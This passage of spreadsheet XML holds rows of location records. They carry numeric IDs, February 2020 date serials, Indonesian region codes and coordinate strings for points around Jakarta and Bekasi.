      <c r="T923" t="s">
        <v>33</v>
      </c>
      <c r="U923" s="5">
        <v>10691905</v>
      </c>
      <c r="V923" s="5" t="s">
        <v>15289</v>
      </c>
      <c r="W923" s="5">
        <v>-614400</v>
      </c>
      <c r="X923" t="s">
        <v>19082</v>
      </c>
      <c r="Y923" t="str">
        <f t="shared" si="14"/>
        <v>-6.14400,106.91905</v>
      </c>
    </row>
    <row r="924" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A924">
        <v>108494</v>
      </c>
      <c r="B924" s="1">
        <v>43883</v>
      </c>
      <c r="C924">
        <v>1</v>
      </c>
      <c r="D924" t="s">
        <v>22</v>
      </c>
      <c r="E924" t="s">
        <v>23</v>
      </c>
      <c r="F924" t="s">
        <v>3573</v>
      </c>
      <c r="G924" t="s">
        <v>3574</v>
      </c>
      <c r="H924" t="s">
        <v>26</v>
      </c>
      <c r="I924" t="s">
        <v>1046</v>
      </c>
      <c r="J924" t="s">
        <v>3575</v>
      </c>
      <c r="M924">
        <v>3172080003</v>
      </c>
      <c r="N924">
        <v>3172080</v>
      </c>
      <c r="O924">
        <v>3172</v>
      </c>
      <c r="P924">
        <v>31</v>
      </c>
      <c r="Q924" t="s">
        <v>2250</v>
      </c>
      <c r="R924" t="s">
        <v>141</v>
      </c>
      <c r="S924" t="s">
        <v>49</v>
      </c>
      <c r="T924" t="s">
        <v>33</v>
      </c>
      <c r="U924" s="5">
        <v>10694749</v>
      </c>
      <c r="V924" s="5" t="s">
        <v>15311</v>
      </c>
      <c r="W924" s="5">
        <v>-619491</v>
      </c>
      <c r="X924" t="s">
        <v>19104</v>
      </c>
      <c r="Y924" t="str">
        <f t="shared" si="14"/>
        <v>-6.19491,106.94749</v>
      </c>
    </row>
    <row r="925" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A925">
        <v>108495</v>
      </c>
      <c r="B925" s="1">
        <v>43883</v>
      </c>
      <c r="C925">
        <v>1</v>
      </c>
      <c r="D925" t="s">
        <v>22</v>
      </c>
      <c r="E925" t="s">
        <v>23</v>
      </c>
      <c r="F925" t="s">
        <v>3576</v>
      </c>
      <c r="H925" t="s">
        <v>26</v>
      </c>
      <c r="I925" t="s">
        <v>3577</v>
      </c>
      <c r="J925" t="s">
        <v>3212</v>
      </c>
      <c r="L925" t="s">
        <v>3578</v>
      </c>
      <c r="M925">
        <v>3173050003</v>
      </c>
      <c r="N925">
        <v>3173050</v>
      </c>
      <c r="O925">
        <v>3173</v>
      </c>
      <c r="P925">
        <v>31</v>
      </c>
      <c r="Q925" t="s">
        <v>2333</v>
      </c>
      <c r="R925" t="s">
        <v>589</v>
      </c>
      <c r="S925" t="s">
        <v>62</v>
      </c>
      <c r="T925" t="s">
        <v>33</v>
      </c>
      <c r="U925" s="5">
        <v>10686718</v>
      </c>
      <c r="V925" s="5" t="s">
        <v>14531</v>
      </c>
      <c r="W925" s="5">
        <v>-618213</v>
      </c>
      <c r="X925" t="s">
        <v>19105</v>
      </c>
      <c r="Y925" t="str">
        <f t="shared" si="14"/>
        <v>-6.18213,106.86718</v>
      </c>
    </row>
    <row r="926" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A926">
        <v>108496</v>
      </c>
      <c r="B926" s="1">
        <v>43883</v>
      </c>
      <c r="C926">
        <v>1</v>
      </c>
      <c r="D926" t="s">
        <v>22</v>
      </c>
      <c r="E926" t="s">
        <v>23</v>
      </c>
      <c r="F926" t="s">
        <v>3579</v>
      </c>
      <c r="G926" t="s">
        <v>3580</v>
      </c>
      <c r="H926" t="s">
        <v>26</v>
      </c>
      <c r="I926" t="s">
        <v>3577</v>
      </c>
      <c r="J926" t="s">
        <v>3581</v>
      </c>
      <c r="L926" t="s">
        <v>3582</v>
      </c>
      <c r="M926">
        <v>3173040001</v>
      </c>
      <c r="N926">
        <v>3173040</v>
      </c>
      <c r="O926">
        <v>3173</v>
      </c>
      <c r="P926">
        <v>31</v>
      </c>
      <c r="Q926" t="s">
        <v>1598</v>
      </c>
      <c r="R926" t="s">
        <v>1598</v>
      </c>
      <c r="S926" t="s">
        <v>62</v>
      </c>
      <c r="T926" t="s">
        <v>33</v>
      </c>
      <c r="U926" s="5">
        <v>10685527</v>
      </c>
      <c r="V926" s="5" t="s">
        <v>15312</v>
      </c>
      <c r="W926" s="5">
        <v>-618607</v>
      </c>
      <c r="X926" t="s">
        <v>19106</v>
      </c>
      <c r="Y926" t="str">
        <f t="shared" si="14"/>
        <v>-6.18607,106.85527</v>
      </c>
    </row>
    <row r="927" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A927">
        <v>108497</v>
      </c>
      <c r="B927" s="1">
        <v>43883</v>
      </c>
      <c r="C927">
        <v>1</v>
      </c>
      <c r="D927" t="s">
        <v>22</v>
      </c>
      <c r="E927" t="s">
        <v>23</v>
      </c>
      <c r="F927" t="s">
        <v>3583</v>
      </c>
      <c r="G927" t="s">
        <v>3584</v>
      </c>
      <c r="H927" t="s">
        <v>26</v>
      </c>
      <c r="I927" t="s">
        <v>1909</v>
      </c>
      <c r="J927" t="s">
        <v>3585</v>
      </c>
      <c r="L927" t="s">
        <v>3586</v>
      </c>
      <c r="M927">
        <v>3173050001</v>
      </c>
      <c r="N927">
        <v>3173050</v>
      </c>
      <c r="O927">
        <v>3173</v>
      </c>
      <c r="P927">
        <v>31</v>
      </c>
      <c r="Q927" t="s">
        <v>2790</v>
      </c>
      <c r="R927" t="s">
        <v>589</v>
      </c>
      <c r="S927" t="s">
        <v>62</v>
      </c>
      <c r="T927" t="s">
        <v>33</v>
      </c>
      <c r="U927" s="5">
        <v>10686215</v>
      </c>
      <c r="V927" s="5" t="s">
        <v>15313</v>
      </c>
      <c r="W927" s="5">
        <v>-619077</v>
      </c>
      <c r="X927" t="s">
        <v>19107</v>
      </c>
      <c r="Y927" t="str">
        <f t="shared" si="14"/>
        <v>-6.19077,106.86215</v>
      </c>
    </row>
    <row r="928" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A928">
        <v>108498</v>
      </c>
      <c r="B928" s="1">
        <v>43883</v>
      </c>
      <c r="C928">
        <v>1</v>
      </c>
      <c r="D928" t="s">
        <v>22</v>
      </c>
      <c r="E928" t="s">
        <v>23</v>
      </c>
      <c r="F928" t="s">
        <v>3587</v>
      </c>
      <c r="G928" t="s">
        <v>3588</v>
      </c>
      <c r="H928" t="s">
        <v>26</v>
      </c>
      <c r="I928" t="s">
        <v>1046</v>
      </c>
      <c r="J928" t="s">
        <v>2725</v>
      </c>
      <c r="L928" t="s">
        <v>3589</v>
      </c>
      <c r="M928">
        <v>3172100005</v>
      </c>
      <c r="N928">
        <v>3172100</v>
      </c>
      <c r="O928">
        <v>3172</v>
      </c>
      <c r="P928">
        <v>31</v>
      </c>
      <c r="Q928" t="s">
        <v>1773</v>
      </c>
      <c r="R928" t="s">
        <v>1436</v>
      </c>
      <c r="S928" t="s">
        <v>49</v>
      </c>
      <c r="T928" t="s">
        <v>33</v>
      </c>
      <c r="U928" s="5">
        <v>10687027</v>
      </c>
      <c r="V928" s="5" t="s">
        <v>15314</v>
      </c>
      <c r="W928" s="5">
        <v>-619952</v>
      </c>
      <c r="X928" t="s">
        <v>19108</v>
      </c>
      <c r="Y928" t="str">
        <f t="shared" si="14"/>
        <v>-6.19952,106.87027</v>
      </c>
    </row>
    <row r="929" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A929">
        <v>108499</v>
      </c>
      <c r="B929" s="1">
        <v>43883</v>
      </c>
      <c r="C929">
        <v>1</v>
      </c>
      <c r="D929" t="s">
        <v>22</v>
      </c>
      <c r="E929" t="s">
        <v>23</v>
      </c>
      <c r="F929" s="3" t="s">
        <v>3590</v>
      </c>
      <c r="H929" t="s">
        <v>26</v>
      </c>
      <c r="I929" t="s">
        <v>65</v>
      </c>
      <c r="J929" t="s">
        <v>3501</v>
      </c>
      <c r="L929" t="s">
        <v>3591</v>
      </c>
      <c r="M929">
        <v>3175060001</v>
      </c>
      <c r="N929">
        <v>3175060</v>
      </c>
      <c r="O929">
        <v>3175</v>
      </c>
      <c r="P929">
        <v>31</v>
      </c>
      <c r="Q929" t="s">
        <v>2278</v>
      </c>
      <c r="R929" t="s">
        <v>2279</v>
      </c>
      <c r="S929" t="s">
        <v>547</v>
      </c>
      <c r="T929" t="s">
        <v>33</v>
      </c>
      <c r="U929" s="5">
        <v>10691918</v>
      </c>
      <c r="V929" s="5" t="s">
        <v>15315</v>
      </c>
      <c r="W929" s="5">
        <v>-614307</v>
      </c>
      <c r="X929" t="s">
        <v>19109</v>
      </c>
      <c r="Y929" t="str">
        <f t="shared" si="14"/>
        <v>-6.14307,106.91918</v>
      </c>
    </row>
    <row r="930" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A930">
        <v>108500</v>
      </c>
      <c r="B930" s="1">
        <v>43883</v>
      </c>
      <c r="C930">
        <v>1</v>
      </c>
      <c r="D930" t="s">
        <v>22</v>
      </c>
      <c r="E930" t="s">
        <v>23</v>
      </c>
      <c r="F930" t="s">
        <v>3592</v>
      </c>
      <c r="G930" t="s">
        <v>3593</v>
      </c>
      <c r="H930" t="s">
        <v>26</v>
      </c>
      <c r="I930" t="s">
        <v>753</v>
      </c>
      <c r="J930" t="s">
        <v>3229</v>
      </c>
      <c r="L930" t="s">
        <v>3594</v>
      </c>
      <c r="M930">
        <v>3175050002</v>
      </c>
      <c r="N930">
        <v>3175050</v>
      </c>
      <c r="O930">
        <v>3175</v>
      </c>
      <c r="P930">
        <v>31</v>
      </c>
      <c r="Q930" t="s">
        <v>1012</v>
      </c>
      <c r="R930" t="s">
        <v>1013</v>
      </c>
      <c r="S930" t="s">
        <v>547</v>
      </c>
      <c r="T930" t="s">
        <v>33</v>
      </c>
      <c r="U930" s="5">
        <v>10690285</v>
      </c>
      <c r="V930" s="5" t="s">
        <v>15316</v>
      </c>
      <c r="W930" s="5">
        <v>-616706</v>
      </c>
      <c r="X930" t="s">
        <v>19110</v>
      </c>
      <c r="Y930" t="str">
        <f t="shared" si="14"/>
        <v>-6.16706,106.90285</v>
      </c>
    </row>
    <row r="931" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A931">
        <v>108501</v>
      </c>
      <c r="B931" s="1">
        <v>43883</v>
      </c>
      <c r="C931">
        <v>1</v>
      </c>
      <c r="D931" t="s">
        <v>22</v>
      </c>
      <c r="E931" t="s">
        <v>23</v>
      </c>
      <c r="F931" t="s">
        <v>3595</v>
      </c>
      <c r="G931" t="s">
        <v>3596</v>
      </c>
      <c r="H931" t="s">
        <v>26</v>
      </c>
      <c r="I931" t="s">
        <v>166</v>
      </c>
      <c r="J931" t="s">
        <v>3597</v>
      </c>
      <c r="L931" t="s">
        <v>3598</v>
      </c>
      <c r="M931">
        <v>3175010003</v>
      </c>
      <c r="N931">
        <v>3175010</v>
      </c>
      <c r="O931">
        <v>3175</v>
      </c>
      <c r="P931">
        <v>31</v>
      </c>
      <c r="Q931" t="s">
        <v>545</v>
      </c>
      <c r="R931" t="s">
        <v>546</v>
      </c>
      <c r="S931" t="s">
        <v>547</v>
      </c>
      <c r="T931" t="s">
        <v>33</v>
      </c>
      <c r="U931" s="5">
        <v>10677813</v>
      </c>
      <c r="V931" s="5" t="s">
        <v>15317</v>
      </c>
      <c r="W931" s="5">
        <v>-613870</v>
      </c>
      <c r="X931" t="s">
        <v>19111</v>
      </c>
      <c r="Y931" t="str">
        <f t="shared" si="14"/>
        <v>-6.13870,106.77813</v>
      </c>
    </row>
    <row r="932" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A932">
        <v>108502</v>
      </c>
      <c r="B932" s="1">
        <v>43883</v>
      </c>
      <c r="C932">
        <v>1</v>
      </c>
      <c r="D932" t="s">
        <v>22</v>
      </c>
      <c r="E932" t="s">
        <v>23</v>
      </c>
      <c r="F932" t="s">
        <v>3599</v>
      </c>
      <c r="H932" t="s">
        <v>26</v>
      </c>
      <c r="I932" t="s">
        <v>1009</v>
      </c>
      <c r="J932" t="s">
        <v>1519</v>
      </c>
      <c r="L932" t="s">
        <v>3600</v>
      </c>
      <c r="M932">
        <v>3175010003</v>
      </c>
      <c r="N932">
        <v>3175010</v>
      </c>
      <c r="O932">
        <v>3175</v>
      </c>
      <c r="P932">
        <v>31</v>
      </c>
      <c r="Q932" t="s">
        <v>545</v>
      </c>
      <c r="R932" t="s">
        <v>546</v>
      </c>
      <c r="S932" t="s">
        <v>547</v>
      </c>
      <c r="T932" t="s">
        <v>33</v>
      </c>
      <c r="U932" s="5">
        <v>10677639</v>
      </c>
      <c r="V932" s="5" t="s">
        <v>15318</v>
      </c>
      <c r="W932" s="5">
        <v>-614253</v>
      </c>
      <c r="X932" t="s">
        <v>19112</v>
      </c>
      <c r="Y932" t="str">
        <f t="shared" si="14"/>
        <v>-6.14253,106.77639</v>
      </c>
    </row>
    <row r="933" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A933">
        <v>108503</v>
      </c>
      <c r="B933" s="1">
        <v>43883</v>
      </c>
      <c r="C933">
        <v>1</v>
      </c>
      <c r="D933" t="s">
        <v>22</v>
      </c>
      <c r="E933" t="s">
        <v>23</v>
      </c>
      <c r="F933" t="s">
        <v>3601</v>
      </c>
      <c r="G933" t="s">
        <v>3602</v>
      </c>
      <c r="H933" t="s">
        <v>26</v>
      </c>
      <c r="I933" t="s">
        <v>3603</v>
      </c>
      <c r="J933" t="s">
        <v>3604</v>
      </c>
      <c r="L933" t="s">
        <v>3605</v>
      </c>
      <c r="M933">
        <v>3172080004</v>
      </c>
      <c r="N933">
        <v>3172080</v>
      </c>
      <c r="O933">
        <v>3172</v>
      </c>
      <c r="P933">
        <v>31</v>
      </c>
      <c r="Q933" t="s">
        <v>3084</v>
      </c>
      <c r="R933" t="s">
        <v>141</v>
      </c>
      <c r="S933" t="s">
        <v>49</v>
      </c>
      <c r="T933" t="s">
        <v>33</v>
      </c>
      <c r="U933" s="5">
        <v>10696434</v>
      </c>
      <c r="V933" s="5" t="s">
        <v>15319</v>
      </c>
      <c r="W933" s="5">
        <v>-617558</v>
      </c>
      <c r="X933" t="s">
        <v>19113</v>
      </c>
      <c r="Y933" t="str">
        <f t="shared" si="14"/>
        <v>-6.17558,106.96434</v>
      </c>
    </row>
    <row r="934" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A934">
        <v>108504</v>
      </c>
      <c r="B934" s="1">
        <v>43883</v>
      </c>
      <c r="C934">
        <v>1</v>
      </c>
      <c r="D934" t="s">
        <v>22</v>
      </c>
      <c r="E934" t="s">
        <v>23</v>
      </c>
      <c r="F934" t="s">
        <v>3606</v>
      </c>
      <c r="G934" t="s">
        <v>3607</v>
      </c>
      <c r="H934" t="s">
        <v>26</v>
      </c>
      <c r="I934" t="s">
        <v>974</v>
      </c>
      <c r="J934" t="s">
        <v>2672</v>
      </c>
      <c r="L934" t="s">
        <v>3608</v>
      </c>
      <c r="M934">
        <v>3172080005</v>
      </c>
      <c r="N934">
        <v>3172080</v>
      </c>
      <c r="O934">
        <v>3172</v>
      </c>
      <c r="P934">
        <v>31</v>
      </c>
      <c r="Q934" t="s">
        <v>140</v>
      </c>
      <c r="R934" t="s">
        <v>141</v>
      </c>
      <c r="S934" t="s">
        <v>49</v>
      </c>
      <c r="T934" t="s">
        <v>33</v>
      </c>
      <c r="U934" s="5">
        <v>10695632</v>
      </c>
      <c r="V934" s="5" t="s">
        <v>15320</v>
      </c>
      <c r="W934" s="5">
        <v>-615978</v>
      </c>
      <c r="X934" t="s">
        <v>19114</v>
      </c>
      <c r="Y934" t="str">
        <f t="shared" si="14"/>
        <v>-6.15978,106.95632</v>
      </c>
    </row>
    <row r="935" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A935">
        <v>108505</v>
      </c>
      <c r="B935" s="1">
        <v>43883</v>
      </c>
      <c r="C935">
        <v>1</v>
      </c>
      <c r="D935" t="s">
        <v>22</v>
      </c>
      <c r="E935" t="s">
        <v>23</v>
      </c>
      <c r="F935" t="s">
        <v>3609</v>
      </c>
      <c r="G935" t="s">
        <v>3610</v>
      </c>
      <c r="H935" t="s">
        <v>26</v>
      </c>
      <c r="I935" t="s">
        <v>1758</v>
      </c>
      <c r="J935" t="s">
        <v>2627</v>
      </c>
      <c r="L935" t="s">
        <v>3611</v>
      </c>
      <c r="M935">
        <v>3275061004</v>
      </c>
      <c r="N935">
        <v>3275061</v>
      </c>
      <c r="O935">
        <v>3275</v>
      </c>
      <c r="P935">
        <v>32</v>
      </c>
      <c r="Q935" t="s">
        <v>39</v>
      </c>
      <c r="R935" t="s">
        <v>40</v>
      </c>
      <c r="S935" t="s">
        <v>41</v>
      </c>
      <c r="T935" t="s">
        <v>42</v>
      </c>
      <c r="U935" s="5">
        <v>10698541</v>
      </c>
      <c r="V935" s="5" t="s">
        <v>15321</v>
      </c>
      <c r="W935" s="5">
        <v>-619148</v>
      </c>
      <c r="X935" t="s">
        <v>19115</v>
      </c>
      <c r="Y935" t="str">
        <f t="shared" si="14"/>
        <v>-6.19148,106.98541</v>
      </c>
    </row>
    <row r="936" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A936">
        <v>108506</v>
      </c>
      <c r="B936" s="1">
        <v>43883</v>
      </c>
      <c r="C936">
        <v>1</v>
      </c>
      <c r="D936" t="s">
        <v>22</v>
      </c>
      <c r="E936" t="s">
        <v>23</v>
      </c>
      <c r="F936" t="s">
        <v>3612</v>
      </c>
      <c r="H936" t="s">
        <v>26</v>
      </c>
      <c r="I936" t="s">
        <v>523</v>
      </c>
      <c r="J936" t="s">
        <v>3613</v>
      </c>
      <c r="L936" t="s">
        <v>3614</v>
      </c>
      <c r="M936">
        <v>3175050001</v>
      </c>
      <c r="N936">
        <v>3175050</v>
      </c>
      <c r="O936">
        <v>3175</v>
      </c>
      <c r="P936">
        <v>31</v>
      </c>
      <c r="Q936" t="s">
        <v>1037</v>
      </c>
      <c r="R936" t="s">
        <v>1013</v>
      </c>
      <c r="S936" t="s">
        <v>547</v>
      </c>
      <c r="T936" t="s">
        <v>33</v>
      </c>
      <c r="U936" s="5">
        <v>10689901</v>
      </c>
      <c r="V936" s="5" t="s">
        <v>15322</v>
      </c>
      <c r="W936" s="5">
        <v>-615690</v>
      </c>
      <c r="X936" t="s">
        <v>19116</v>
      </c>
      <c r="Y936" t="str">
        <f t="shared" si="14"/>
        <v>-6.15690,106.89901</v>
      </c>
    </row>
    <row r="937" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A937">
        <v>108507</v>
      </c>
      <c r="B937" s="1">
        <v>43883</v>
      </c>
      <c r="C937">
        <v>1</v>
      </c>
      <c r="D937" t="s">
        <v>22</v>
      </c>
      <c r="E937" t="s">
        <v>23</v>
      </c>
      <c r="F937" t="s">
        <v>3615</v>
      </c>
      <c r="H937" t="s">
        <v>26</v>
      </c>
      <c r="I937" t="s">
        <v>3616</v>
      </c>
      <c r="J937" t="s">
        <v>3617</v>
      </c>
      <c r="L937" t="s">
        <v>3618</v>
      </c>
      <c r="M937">
        <v>3172060005</v>
      </c>
      <c r="N937">
        <v>3172060</v>
      </c>
      <c r="O937">
        <v>3172</v>
      </c>
      <c r="P937">
        <v>31</v>
      </c>
      <c r="Q937" t="s">
        <v>1019</v>
      </c>
      <c r="R937" t="s">
        <v>48</v>
      </c>
      <c r="S937" t="s">
        <v>49</v>
      </c>
      <c r="T937" t="s">
        <v>33</v>
      </c>
      <c r="U937" s="5">
        <v>10687790</v>
      </c>
      <c r="V937" s="5" t="s">
        <v>15323</v>
      </c>
      <c r="W937" s="5">
        <v>-621680</v>
      </c>
      <c r="X937" t="s">
        <v>19117</v>
      </c>
      <c r="Y937" t="str">
        <f t="shared" si="14"/>
        <v>-6.21680,106.87790</v>
      </c>
    </row>
    <row r="938" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A938">
        <v>108508</v>
      </c>
      <c r="B938" s="1">
        <v>43883</v>
      </c>
      <c r="C938">
        <v>1</v>
      </c>
      <c r="D938" t="s">
        <v>22</v>
      </c>
      <c r="E938" t="s">
        <v>23</v>
      </c>
      <c r="F938" t="s">
        <v>3619</v>
      </c>
      <c r="G938" t="s">
        <v>3620</v>
      </c>
      <c r="H938" t="s">
        <v>26</v>
      </c>
      <c r="I938" t="s">
        <v>131</v>
      </c>
      <c r="J938" t="s">
        <v>3259</v>
      </c>
      <c r="L938" t="s">
        <v>3621</v>
      </c>
      <c r="M938">
        <v>3172100006</v>
      </c>
      <c r="N938">
        <v>3172100</v>
      </c>
      <c r="O938">
        <v>3172</v>
      </c>
      <c r="P938">
        <v>31</v>
      </c>
      <c r="Q938" t="s">
        <v>1435</v>
      </c>
      <c r="R938" t="s">
        <v>1436</v>
      </c>
      <c r="S938" t="s">
        <v>49</v>
      </c>
      <c r="T938" t="s">
        <v>33</v>
      </c>
      <c r="U938" s="5">
        <v>10687070</v>
      </c>
      <c r="V938" s="5" t="s">
        <v>15324</v>
      </c>
      <c r="W938" s="5">
        <v>-619818</v>
      </c>
      <c r="X938" t="s">
        <v>19118</v>
      </c>
      <c r="Y938" t="str">
        <f t="shared" si="14"/>
        <v>-6.19818,106.87070</v>
      </c>
    </row>
    <row r="939" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A939">
        <v>108509</v>
      </c>
      <c r="B939" s="1">
        <v>43883</v>
      </c>
      <c r="C939">
        <v>1</v>
      </c>
      <c r="D939" t="s">
        <v>22</v>
      </c>
      <c r="E939" t="s">
        <v>23</v>
      </c>
      <c r="F939" t="s">
        <v>3622</v>
      </c>
      <c r="G939" t="s">
        <v>3623</v>
      </c>
      <c r="H939" t="s">
        <v>26</v>
      </c>
      <c r="I939" t="s">
        <v>1891</v>
      </c>
      <c r="J939" t="s">
        <v>3624</v>
      </c>
      <c r="L939" t="s">
        <v>3625</v>
      </c>
      <c r="M939">
        <v>3172090007</v>
      </c>
      <c r="N939">
        <v>3172090</v>
      </c>
      <c r="O939">
        <v>3172</v>
      </c>
      <c r="P939">
        <v>31</v>
      </c>
      <c r="Q939" t="s">
        <v>890</v>
      </c>
      <c r="R939" t="s">
        <v>890</v>
      </c>
      <c r="S939" t="s">
        <v>49</v>
      </c>
      <c r="T939" t="s">
        <v>33</v>
      </c>
      <c r="U939" s="5">
        <v>10690156</v>
      </c>
      <c r="V939" s="5" t="s">
        <v>15325</v>
      </c>
      <c r="W939" s="5">
        <v>-618635</v>
      </c>
      <c r="X939" t="s">
        <v>19119</v>
      </c>
      <c r="Y939" t="str">
        <f t="shared" si="14"/>
        <v>-6.18635,106.90156</v>
      </c>
    </row>
    <row r="940" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A940">
        <v>108510</v>
      </c>
      <c r="B940" s="1">
        <v>43883</v>
      </c>
      <c r="C940">
        <v>1</v>
      </c>
      <c r="D940" t="s">
        <v>85</v>
      </c>
      <c r="E940" t="s">
        <v>23</v>
      </c>
      <c r="F940" t="s">
        <v>3626</v>
      </c>
      <c r="H940" t="s">
        <v>26</v>
      </c>
      <c r="J940" t="s">
        <v>3627</v>
      </c>
      <c r="K940" t="s">
        <v>3628</v>
      </c>
      <c r="L940" t="s">
        <v>3629</v>
      </c>
      <c r="M940">
        <v>3171090003</v>
      </c>
      <c r="N940">
        <v>3171090</v>
      </c>
      <c r="O940">
        <v>3171</v>
      </c>
      <c r="P940">
        <v>31</v>
      </c>
      <c r="Q940" t="s">
        <v>3154</v>
      </c>
      <c r="R940" t="s">
        <v>347</v>
      </c>
      <c r="S940" t="s">
        <v>108</v>
      </c>
      <c r="T940" t="s">
        <v>33</v>
      </c>
      <c r="U940" s="5">
        <v>10685619</v>
      </c>
      <c r="V940" s="5" t="s">
        <v>15326</v>
      </c>
      <c r="W940" s="5">
        <v>-622741</v>
      </c>
      <c r="X940" t="s">
        <v>19120</v>
      </c>
      <c r="Y940" t="str">
        <f t="shared" si="14"/>
        <v>-6.22741,106.85619</v>
      </c>
    </row>
    <row r="941" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A941">
        <v>108511</v>
      </c>
      <c r="B941" s="1">
        <v>43883</v>
      </c>
      <c r="C941">
        <v>1</v>
      </c>
      <c r="D941" t="s">
        <v>22</v>
      </c>
      <c r="E941" t="s">
        <v>23</v>
      </c>
      <c r="F941" t="s">
        <v>3630</v>
      </c>
      <c r="G941" t="s">
        <v>3631</v>
      </c>
      <c r="H941" t="s">
        <v>26</v>
      </c>
      <c r="I941" t="s">
        <v>3632</v>
      </c>
      <c r="J941" t="s">
        <v>3633</v>
      </c>
      <c r="M941">
        <v>3172100006</v>
      </c>
      <c r="N941">
        <v>3172100</v>
      </c>
      <c r="O941">
        <v>3172</v>
      </c>
      <c r="P941">
        <v>31</v>
      </c>
      <c r="Q941" t="s">
        <v>1435</v>
      </c>
      <c r="R941" t="s">
        <v>1436</v>
      </c>
      <c r="S941" t="s">
        <v>49</v>
      </c>
      <c r="T941" t="s">
        <v>33</v>
      </c>
      <c r="U941" s="5">
        <v>10686620</v>
      </c>
      <c r="V941" s="5" t="s">
        <v>15327</v>
      </c>
      <c r="W941" s="5">
        <v>-619759</v>
      </c>
      <c r="X941" t="s">
        <v>19121</v>
      </c>
      <c r="Y941" t="str">
        <f t="shared" si="14"/>
        <v>-6.19759,106.86620</v>
      </c>
    </row>
    <row r="942" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A942">
        <v>108512</v>
      </c>
      <c r="B942" s="1">
        <v>43883</v>
      </c>
      <c r="C942">
        <v>1</v>
      </c>
      <c r="D942" t="s">
        <v>22</v>
      </c>
      <c r="E942" t="s">
        <v>23</v>
      </c>
      <c r="F942" t="s">
        <v>3634</v>
      </c>
      <c r="G942" t="s">
        <v>3635</v>
      </c>
      <c r="H942" t="s">
        <v>26</v>
      </c>
      <c r="I942" t="s">
        <v>137</v>
      </c>
      <c r="J942" t="s">
        <v>3636</v>
      </c>
      <c r="L942" t="s">
        <v>3637</v>
      </c>
      <c r="M942">
        <v>3172090005</v>
      </c>
      <c r="N942">
        <v>3172090</v>
      </c>
      <c r="O942">
        <v>3172</v>
      </c>
      <c r="P942">
        <v>31</v>
      </c>
      <c r="Q942" t="s">
        <v>2749</v>
      </c>
      <c r="R942" t="s">
        <v>890</v>
      </c>
      <c r="S942" t="s">
        <v>49</v>
      </c>
      <c r="T942" t="s">
        <v>33</v>
      </c>
      <c r="U942" s="5">
        <v>10688912</v>
      </c>
      <c r="V942" s="5" t="s">
        <v>15328</v>
      </c>
      <c r="W942" s="5">
        <v>-619593</v>
      </c>
      <c r="X942" t="s">
        <v>18867</v>
      </c>
      <c r="Y942" t="str">
        <f t="shared" si="14"/>
        <v>-6.19593,106.88912</v>
      </c>
    </row>
    <row r="943" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A943">
        <v>108513</v>
      </c>
      <c r="B943" s="1">
        <v>43884</v>
      </c>
      <c r="C943">
        <v>0</v>
      </c>
      <c r="D943" t="s">
        <v>22</v>
      </c>
      <c r="E943" t="s">
        <v>23</v>
      </c>
      <c r="F943" t="s">
        <v>3638</v>
      </c>
      <c r="G943" t="s">
        <v>3639</v>
      </c>
      <c r="H943" t="s">
        <v>26</v>
      </c>
      <c r="I943" t="s">
        <v>657</v>
      </c>
      <c r="J943" t="s">
        <v>3049</v>
      </c>
      <c r="L943" t="s">
        <v>3640</v>
      </c>
      <c r="M943">
        <v>3175060002</v>
      </c>
      <c r="N943">
        <v>3175060</v>
      </c>
      <c r="O943">
        <v>3175</v>
      </c>
      <c r="P943">
        <v>31</v>
      </c>
      <c r="Q943" t="s">
        <v>2674</v>
      </c>
      <c r="R943" t="s">
        <v>2279</v>
      </c>
      <c r="S943" t="s">
        <v>547</v>
      </c>
      <c r="T943" t="s">
        <v>33</v>
      </c>
      <c r="U943" s="5">
        <v>10695018</v>
      </c>
      <c r="V943" s="5" t="s">
        <v>15329</v>
      </c>
      <c r="W943" s="5">
        <v>-615270</v>
      </c>
      <c r="X943" t="s">
        <v>19122</v>
      </c>
      <c r="Y943" t="str">
        <f t="shared" si="14"/>
        <v>-6.15270,106.95018</v>
      </c>
    </row>
    <row r="944" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A944">
        <v>108514</v>
      </c>
      <c r="B944" s="1">
        <v>43884</v>
      </c>
      <c r="C944">
        <v>0</v>
      </c>
      <c r="D944" t="s">
        <v>22</v>
      </c>
      <c r="E944" t="s">
        <v>23</v>
      </c>
      <c r="F944" t="s">
        <v>3641</v>
      </c>
      <c r="G944" t="s">
        <v>3642</v>
      </c>
      <c r="H944" t="s">
        <v>26</v>
      </c>
      <c r="I944" t="s">
        <v>1201</v>
      </c>
      <c r="J944" t="s">
        <v>138</v>
      </c>
      <c r="L944" t="s">
        <v>3643</v>
      </c>
      <c r="M944">
        <v>3172080005</v>
      </c>
      <c r="N944">
        <v>3172080</v>
      </c>
      <c r="O944">
        <v>3172</v>
      </c>
      <c r="P944">
        <v>31</v>
      </c>
      <c r="Q944" t="s">
        <v>140</v>
      </c>
      <c r="R944" t="s">
        <v>141</v>
      </c>
      <c r="S944" t="s">
        <v>49</v>
      </c>
      <c r="T944" t="s">
        <v>33</v>
      </c>
      <c r="U944" s="5">
        <v>10694975</v>
      </c>
      <c r="V944" s="5" t="s">
        <v>15153</v>
      </c>
      <c r="W944" s="5">
        <v>-616993</v>
      </c>
      <c r="X944" t="s">
        <v>19123</v>
      </c>
      <c r="Y944" t="str">
        <f t="shared" si="14"/>
        <v>-6.16993,106.94975</v>
      </c>
    </row>
    <row r="945" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A945">
        <v>108515</v>
      </c>
      <c r="B945" s="1">
        <v>43884</v>
      </c>
      <c r="C945">
        <v>0</v>
      </c>
      <c r="D945" t="s">
        <v>22</v>
      </c>
